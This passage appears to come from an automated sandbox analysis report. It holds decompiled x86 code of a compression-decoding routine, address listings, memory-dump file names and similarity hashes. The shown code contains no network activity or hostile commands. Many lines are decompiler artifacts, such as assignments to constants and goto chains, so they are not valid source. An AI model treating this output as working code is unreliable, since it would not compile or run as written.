              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							_t208 =  &_v116;
              							 *_t208 = _v116 + 1;
              							__eflags =  *_t208;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							L62:
              							__eflags = __ebx - 0x100;
              							if(__ebx >= 0x100) {
              								L57:
              								__al = _v72;
              								_v96 = _v72;
              								goto L58;
              							}
              							L63:
              							__eax = _v92;
              							__edx = __ebx + __ebx;
              							__ecx = _v20;
              							__esi = __edx + __eax;
              							__ecx = _v20 >> 0xb;
              							__ax =  *__esi;
              							_v88 = __esi;
              							__edi = __ax & 0x0000ffff;
              							__ecx = (_v20 >> 0xb) * __edi;
              							__eflags = _v16 - __ecx;
              							if(_v16 >= __ecx) {
              								_v20 = _v20 - __ecx;
              								_v16 = _v16 - __ecx;
              								__cx = __ax;
              								_t222 = __edx + 1; // 0x1
              								__ebx = _t222;
              								__cx = __ax >> 5;
              								__eflags = __eax;
              								 *__esi = __ax;
              							} else {
              								_v20 = __ecx;
              								0x800 = 0x800 - __edi;
              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              								__ebx = __ebx + __ebx;
              								 *__esi = __cx;
              							}
              							__eflags = _v20 - 0x1000000;
              							_v72 = __ebx;
              							if(_v20 >= 0x1000000) {
              								goto L62;
              							} else {
              								goto L60;
              							}
              						case 0x10:
              							L112:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 0x10;
              								goto L173;
              							}
              							__ecx = _v116;
              							__eax = _v16;
              							_v20 = _v20 << 8;
              							__ecx =  *_v116 & 0x000000ff;
              							_v112 = _v112 - 1;
              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							_t371 =  &_v116;
              							 *_t371 = _v116 + 1;
              							__eflags =  *_t371;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							goto L114;
              						case 0x11:
              							L71:
              							__esi = _v92;
              							_v136 = 0x12;
              							goto L135;
              						case 0x12:
              							__eflags = _v68;
              							if(_v68 != 0) {
              								__eax = _v92;
              								_v136 = 0x13;
              								__esi = _v92 + 2;
              								L135:
              								_v88 = _t626;
              								goto L136;
              							}
              							__eax = _v80;
              							_v52 = _v52 & 0x00000000;
              							__ecx = _v92;
              							__eax = _v80 << 4;
              							__eflags = __eax;
              							__eax = _v92 + __eax + 4;
              							goto L133;
              						case 0x13:
              							__eflags = _v68;
              							if(_v68 != 0) {
              								_t475 =  &_v92;
              								 *_t475 = _v92 + 0x204;
              								__eflags =  *_t475;
              								_v52 = 0x10;
              								_v68 = 8;
              								L147:
              								_v128 = 0x14;
              								goto L148;
              							}
              							__eax = _v80;
              							__ecx = _v92;
              							__eax = _v80 << 4;
              							_v52 = 8;
              							__eax = _v92 + (_v80 << 4) + 0x104;
              							L133:
              							_v92 = __eax;
              							_v68 = 3;
              							goto L147;
              						case 0x14:
              							_v52 = _v52 + __ebx;
              							__eax = _v132;
              							goto L143;
              						case 0x15:
              							__eax = 0;
              							__eflags = _v60 - 7;
              							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
              							__al = __al & 0x000000fd;
              							__eax = (__eflags >= 0) - 1 + 0xb;
              							_v60 = (__eflags >= 0) - 1 + 0xb;
              							goto L123;
              						case 0x16:
              							__eax = _v52;
              							__eflags = __eax - 4;
              							if(__eax >= 4) {
              								_push(3);
              								_pop(__eax);
              							}
              							__ecx = _v8;
              							_v68 = 6;
              							__eax = __eax << 7;
              							_v128 = 0x19;
              							_v92 = __eax;
              							goto L148;
              						case 0x17:
              							L148:
              							__eax = _v68;
              							_v84 = 1;
              							_v76 = _v68;
              							goto L152;
              						case 0x18:
              							L149:
              							__eflags = _v112;
              							if(_v112 == 0) {
              								_v140 = 0x18;
              								goto L173;
              							}
              							__ecx = _v116;
              							__eax = _v16;
              							_v20 = _v20 << 8;
              							__ecx =  *_v116 & 0x000000ff;
              							_v112 = _v112 - 1;
              							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							_t490 =  &_v116;
              							 *_t490 = _v116 + 1;
              							__eflags =  *_t490;
              							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
              							L151:
              							_t493 =  &_v76;
              							 *_t493 = _v76 - 1;
              							__eflags =  *_t493;
              							L152:
              							__eflags = _v76;
              							if(_v76 <= 0) {
              								__ecx = _v68;
              								__ebx = _v84;
              								0 = 1;
              								__eax = 1 << __cl;
              								__ebx = _v84 - (1 << __cl);
              								__eax = _v128;
              								_v72 = __ebx;
              								L143:
              								_v140 = _t561;
              								goto L3;
              							}
              							__eax = _v84;
              							_v20 = _v20 >> 0xb;
              							__edx = _v84 + _v84;
              							__eax = _v92;
              							__esi = __edx + __eax;
              							_v88 = __esi;
              							__ax =  *__esi;
              							__edi = __ax & 0x0000ffff;
              							__ecx = (_v20 >> 0xb) * __edi;
              							__eflags = _v16 - __ecx;
              							if(_v16 >= __ecx) {
              								_v20 = _v20 - __ecx;
              								_v16 = _v16 - __ecx;
              								__cx = __ax;
              								__cx = __ax >> 5;
              								__eax = __eax - __ecx;
              								__edx = __edx + 1;
              								__eflags = __edx;
              								 *__esi = __ax;
              								_v84 = __edx;
              							} else {
              								_v20 = __ecx;
              								0x800 = 0x800 - __edi;
              								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
              								_v84 = _v84 << 1;
              								 *__esi = __cx;
              							}
              							__eflags = _v20 - 0x1000000;
              							if(_v20 >= 0x1000000) {
              								goto L151;
              							} else {
              								goto L149;
              							}
              						case 0x19:
              							__eflags = __ebx - 4;
              							if(__ebx < 4) {
              								_v48 = __ebx;
              								L122:
              								_t399 =  &_v48;
              								 *_t399 = _v48 + 1;
              								__eflags =  *_t399;
              								L123:
              								__eax = _v48;
              								__eflags = __eax;
              								if(__eax == 0) {
              									_v52 = _v52 | 0xffffffff;
              									goto L173;
              								}
              								__eflags = __eax - _v100;
              								if(__eax > _v100) {
              									goto L174;
              								}
              								_v52 = _v52 + 2;
              								__eax = _v52;
              								_t406 =  &_v100;
              								 *_t406 = _v100 + _v52;
              								__eflags =  *_t406;
              								goto L126;
              							}
              							__ecx = __ebx;
              							__eax = __ebx;
              							__ecx = __ebx >> 1;
              							__eax = __ebx & 0x00000001;
              							__ecx = (__ebx >> 1) - 1;
              							__al = __al | 0x00000002;
              							__eax = (__ebx & 0x00000001) << __cl;
              							__eflags = __ebx - 0xe;
              							_v48 = __eax;
              							if(__ebx >= 0xe) {
              								__ebx = 0;
              								_v76 = __ecx;
              								L105:
              								__eflags = _v76;
              								if(_v76 <= 0) {
              									__eax = __eax + __ebx;
              									_v68 = 4;
              									_v48 = __eax;
              									__eax = _v8;
              									__eax = _v8 + 0x644;
              									__eflags = __eax;
              									L111:
              									__ebx = 0;
              									_v92 = __eax;
              									_v84 = 1;
              									_v72 = 0;
              									_v76 = 0;
              									L115:
              									__eax = _v68;
              									__eflags = _v76 - _v68;
              									if(_v76 >= _v68) {
              										_t397 =  &_v48;
              										 *_t397 = _v48 + __ebx;
              										__eflags =  *_t397;
              										goto L122;
              									}
              									__eax = _v84;
              									_v20 = _v20 >> 0xb;
              									__edi = _v84 + _v84;
              									__eax = _v92;
              									__esi = __edi + __eax;
              									_v88 = __esi;
              									__ax =  *__esi;
              									__ecx = __ax & 0x0000ffff;
              									__edx = (_v20 >> 0xb) * __ecx;
              									__eflags = _v16 - __edx;
              									if(_v16 >= __edx) {
              										__ecx = 0;
              										_v20 = _v20 - __edx;
              										__ecx = 1;
              										_v16 = _v16 - __edx;
              										__ebx = 1;
              										__ecx = _v76;
              										__ebx = 1 << __cl;
              										__ecx = 1 << __cl;
              										__ebx = _v72;
              										__ebx = _v72 | __ecx;
              										__cx = __ax;
              										__cx = __ax >> 5;
              										__eax = __eax - __ecx;
              										__edi = __edi + 1;
              										__eflags = __edi;
              										_v72 = __ebx;
              										 *__esi = __ax;
              										_v84 = __edi;
              									} else {
              										_v20 = __edx;
              										0x800 = 0x800 - __ecx;
              										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
              										_v84 = _v84 << 1;
              										 *__esi = __dx;
              									}
              									__eflags = _v20 - 0x1000000;
              									if(_v20 >= 0x1000000) {
              										L114:
              										_t374 =  &_v76;
              										 *_t374 = _v76 + 1;
              										__eflags =  *_t374;
              										goto L115;
              									} else {
              										goto L112;
              									}
              								}
              								__ecx = _v16;
              								__ebx = __ebx + __ebx;
              								_v20 = _v20 >> 1;
              								__eflags = _v16 - _v20;
              								_v72 = __ebx;
              								if(_v16 >= _v20) {
              									__ecx = _v20;
              									_v16 = _v16 - _v20;
              									__ebx = __ebx | 0x00000001;
              									__eflags = __ebx;
              									_v72 = __ebx;
              								}
              								__eflags = _v20 - 0x1000000;
              								if(_v20 >= 0x1000000) {
              									L104:
              									_t344 =  &_v76;
              									 *_t344 = _v76 - 1;
              									__eflags =  *_t344;
              									goto L105;
              								} else {
              									goto L102;
              								}
              							}
              							__edx = _v8;
              							__eax = __eax - __ebx;
              							_v68 = __ecx;
              							__eax = _v8 + 0x55e + __eax * 2;
              							goto L111;
              						case 0x1a:
              							L58:
              							__eflags = _v104;
              							if(_v104 == 0) {
              								_v140 = 0x1a;
              								goto L173;
              							}
              							__ecx = _v108;
              							__al = _v96;
              							__edx = _v12;
              							_v100 = _v100 + 1;
              							_v108 = _v108 + 1;
              							_v104 = _v104 - 1;
              							 *_v108 = __al;
              							__ecx = _v24;
              							 *(_v12 + __ecx) = __al;
              							__eax = __ecx + 1;
              							__edx = 0;
              							_t197 = __eax % _v120;
              							__eax = __eax / _v120;
              							__edx = _t197;
              							goto L82;
              						case 0x1b:
              							L78:
              							__eflags = _v104;
              							if(_v104 == 0) {
              								_v140 = 0x1b;
              								goto L173;
              							}
              							__eax = _v24;
              							__eax = _v24 - _v48;
              							__eflags = __eax - _v120;
              							if(__eax >= _v120) {
              								__eax = __eax + _v120;
              								__eflags = __eax;
              							}
              							__edx = _v12;
              							__cl =  *(__edx + __eax);
              							__eax = _v24;
              							_v96 = __cl;
              							 *(__edx + __eax) = __cl;
              							__eax = __eax + 1;
              							__edx = 0;
              							_t280 = __eax % _v120;
              							__eax = __eax / _v120;
              							__edx = _t280;
              							__eax = _v108;
              							_v100 = _v100 + 1;
              							_v108 = _v108 + 1;
              							_t289 =  &_v104;
              							 *_t289 = _v104 - 1;
              							__eflags =  *_t289;
              							 *_v108 = __cl;
              							L82:
              							_v24 = __edx;
              							goto L83;
              						case 0x1c:
              							while(1) {
              								L126:
              								__eflags = _v104;
              								if(_v104 == 0) {
              									break;
              								}
              								__eax = _v24;
              								__eax = _v24 - _v48;
              								__eflags = __eax - _v120;
              								if(__eax >= _v120) {
              									__eax = __eax + _v120;
              									__eflags = __eax;
              								}
              								__edx = _v12;
              								__cl =  *(__edx + __eax);
              								__eax = _v24;
              								_v96 = __cl;
              								 *(__edx + __eax) = __cl;
              								__eax = __eax + 1;
              								__edx = 0;
              								_t420 = __eax % _v120;
              								__eax = __eax / _v120;
              								__edx = _t420;
              								__eax = _v108;
              								_v108 = _v108 + 1;
              								_v104 = _v104 - 1;
              								_v52 = _v52 - 1;
              								__eflags = _v52;
              								 *_v108 = __cl;
              								_v24 = _t420;
              								if(_v52 > 0) {
              									continue;
              								} else {
              									L83:
              									_v140 = 2;
              									goto L3;
              								}
              							}
              							_v140 = 0x1c;
              							L173:
              							_push(0x22);
              							_pop(_t574);
              							memcpy(_v148,  &_v140, _t574 << 2);
              							return 0;
              					}
              				}
              				L174:
              				_t538 = _t537 | 0xffffffff;
              				return _t538;
              			}
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x00000000
              0x00000000
              0x00407291
              0x00407295
              0x004072b7
              0x004072ba
              0x004072c4
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x00000000
              0x00407385
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x00407442
              0x00000000
              0x00000000
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00407090
              0x00407093
              0x00407096
              0x00407098
              0x0040709a
              0x0040709a
              0x0040709b
              0x0040709e
              0x004070a5
              0x004070a8
              0x004070b6
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00000000
              0x0040739b
              0x0040739b
              0x0040739f
              0x004074d7
              0x00000000
              0x004074d7
              0x004073a5
              0x004073a8
              0x004073ab
              0x004073af
              0x004073b2
              0x004073b8
              0x004073ba
              0x004073ba
              0x004073ba
              0x004073bd
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c3
              0x004073c7
              0x00407427
              0x0040742a
              0x0040742f
              0x00407430
              0x00407432
              0x00407434
              0x00407437
              0x00407343
              0x00407343
              0x00000000
              0x00407343
              0x004073c9
              0x004073cf
              0x004073d2
              0x004073d5
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073e7
              0x004073ea
              0x00407403
              0x00407406
              0x00407409
              0x0040740c
              0x00407410
              0x00407412
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073f4
              0x004073f9
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407419
              0x00407420
              0x00000000
              0x00407422
              0x00000000
              0x00407422
              0x00000000
              0x004070be
              0x004070c1
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x004074e1
              0x004074e7
              0x004074e9
              0x004074f0
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000

              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
              • Instruction ID: 835433ef786a7bbaa66b5d31b28c9fa354c7a4a33243279710ed11147b04f42a
              • Opcode Fuzzy Hash: d02973cee569c5a87d0209c7eb585da92a748f7851f7d1800b7639c908389217
              • Instruction Fuzzy Hash: F1816871D04228CBDF24CFA8C844BAEBBB0FF44305F11816AD856BB281D7786986DF45
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 98%
              			E00406EFA() {
              				signed int _t539;
              				unsigned short _t540;
              				signed int _t541;
              				void _t542;
              				signed int _t543;
              				signed int _t544;
              				signed int _t573;
              				signed int _t576;
              				signed int _t597;
              				signed int* _t614;
              				void* _t621;
              
              				L0:
              				while(1) {
              					L0:
              					if( *(_t621 - 0x40) != 1) {
              						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
              						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
              						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
              						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
              						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
              						_t539 =  *(_t621 - 4) + 0x664;
              						 *(_t621 - 0x58) = _t539;
              						goto L68;
              					} else {
              						 *(__ebp - 0x84) = 8;
              						while(1) {
              							L132:
              							 *(_t621 - 0x54) = _t614;
              							while(1) {
              								L133:
              								_t540 =  *_t614;
              								_t597 = _t540 & 0x0000ffff;
              								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
              								if( *(_t621 - 0xc) >= _t573) {
              									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
              									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
              									 *(_t621 - 0x40) = 1;
              									_t541 = _t540 - (_t540 >> 5);
              									 *_t614 = _t541;
              								} else {
              									 *(_t621 - 0x10) = _t573;
              									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
              									 *_t614 = (0x800 - _t597 >> 5) + _t540;
              								}
              								if( *(_t621 - 0x10) >= 0x1000000) {
              									goto L139;
              								}
              								L137:
              								if( *(_t621 - 0x6c) == 0) {
              									 *(_t621 - 0x88) = 5;
              									L170:
              									_t576 = 0x22;
              									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
              									_t544 = 0;
              									L172:
              									return _t544;
              								}
              								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
              								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
              								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
              								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
              								L139:
              								_t542 =  *(_t621 - 0x84);
              								while(1) {
              									 *(_t621 - 0x88) = _t542;
              									while(1) {
              										L1:
              										_t543 =  *(_t621 - 0x88);
              										if(_t543 > 0x1c) {
              											break;
              										}
              										switch( *((intOrPtr*)(_t543 * 4 +  &M004074FE))) {
              											case 0:
              												if( *(_t621 - 0x6c) == 0) {
              													goto L170;
              												}
              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
              												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
              												_t543 =  *( *(_t621 - 0x70));
              												if(_t543 > 0xe1) {
              													goto L171;
              												}
              												_t547 = _t543 & 0x000000ff;
              												_push(0x2d);
              												asm("cdq");
              												_pop(_t578);
              												_push(9);
              												_pop(_t579);
              												_t617 = _t547 / _t578;
              												_t549 = _t547 % _t578 & 0x000000ff;
              												asm("cdq");
              												_t612 = _t549 % _t579 & 0x000000ff;
              												 *(_t621 - 0x3c) = _t612;
              												 *(_t621 - 0x1c) = (1 << _t617) - 1;
              												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
              												_t620 = (0x300 << _t612 + _t617) + 0x736;
              												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
              													L10:
              													if(_t620 == 0) {
              														L12:
              														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
              														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
              														goto L15;
              													} else {
              														goto L11;
              													}
              													do {
              														L11:
              														_t620 = _t620 - 1;
              														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
              													} while (_t620 != 0);
              													goto L12;
              												}
              												if( *(_t621 - 4) != 0) {
              													GlobalFree( *(_t621 - 4));
              												}
              												_t543 = GlobalAlloc(0x40, 0x600); // executed
              												 *(_t621 - 4) = _t543;
              												if(_t543 == 0) {
              													goto L171;
              												} else {
              													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
              													goto L10;
              												}
              											case 1:
              												L13:
              												__eflags =  *(_t621 - 0x6c);
              												if( *(_t621 - 0x6c) == 0) {
              													 *(_t621 - 0x88) = 1;
              													goto L170;
              												}
              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
              												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
              												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
              												_t45 = _t621 - 0x48;
              												 *_t45 =  *(_t621 - 0x48) + 1;
              												__eflags =  *_t45;
              												L15:
              												if( *(_t621 - 0x48) < 4) {
              													goto L13;
              												}
              												_t555 =  *(_t621 - 0x40);
              												if(_t555 ==  *(_t621 - 0x74)) {
              													L20:
              													 *(_t621 - 0x48) = 5;
              													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
              													goto L23;
              												}
              												 *(_t621 - 0x74) = _t555;
              												if( *(_t621 - 8) != 0) {
              													GlobalFree( *(_t621 - 8));
              												}
              												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
              												 *(_t621 - 8) = _t543;
              												if(_t543 == 0) {
              													goto L171;
              												} else {
              													goto L20;
              												}
              											case 2:
              												L24:
              												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
              												 *(_t621 - 0x84) = 6;
              												 *(_t621 - 0x4c) = _t562;
              												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
              												goto L132;
              											case 3:
              												L21:
              												__eflags =  *(_t621 - 0x6c);
              												if( *(_t621 - 0x6c) == 0) {
              													 *(_t621 - 0x88) = 3;
              													goto L170;
              												}
              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
              												_t67 = _t621 - 0x70;
              												 *_t67 =  &(( *(_t621 - 0x70))[1]);
              												__eflags =  *_t67;
              												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
              												L23:
              												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
              												if( *(_t621 - 0x48) != 0) {
              													goto L21;
              												}
              												goto L24;
              											case 4:
              												L133:
              												_t540 =  *_t614;
              												_t597 = _t540 & 0x0000ffff;
              												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
              												if( *(_t621 - 0xc) >= _t573) {
              													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
              													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
              													 *(_t621 - 0x40) = 1;
              													_t541 = _t540 - (_t540 >> 5);
              													 *_t614 = _t541;
              												} else {
              													 *(_t621 - 0x10) = _t573;
              													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
              													 *_t614 = (0x800 - _t597 >> 5) + _t540;
              												}
              												if( *(_t621 - 0x10) >= 0x1000000) {
              													goto L139;
              												}
              											case 5:
              												goto L137;
              											case 6:
              												__edx = 0;
              												__eflags =  *(__ebp - 0x40);
              												if( *(__ebp - 0x40) != 0) {
              													__eax =  *(__ebp - 4);
              													__ecx =  *(__ebp - 0x38);
              													 *(__ebp - 0x34) = 1;
              													 *(__ebp - 0x84) = 7;
              													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
              													L132:
              													 *(_t621 - 0x54) = _t614;
              													goto L133;
              												}
              												__eax =  *(__ebp - 0x5c) & 0x000000ff;
              												__esi =  *(__ebp - 0x60);
              												__cl = 8;
              												__cl = 8 -  *(__ebp - 0x3c);
              												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
              												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
              												__ecx =  *(__ebp - 0x3c);
              												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
              												__ecx =  *(__ebp - 4);
              												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
              												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
              												__eflags =  *(__ebp - 0x38) - 4;
              												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
              												if( *(__ebp - 0x38) >= 4) {
              													__eflags =  *(__ebp - 0x38) - 0xa;
              													if( *(__ebp - 0x38) >= 0xa) {
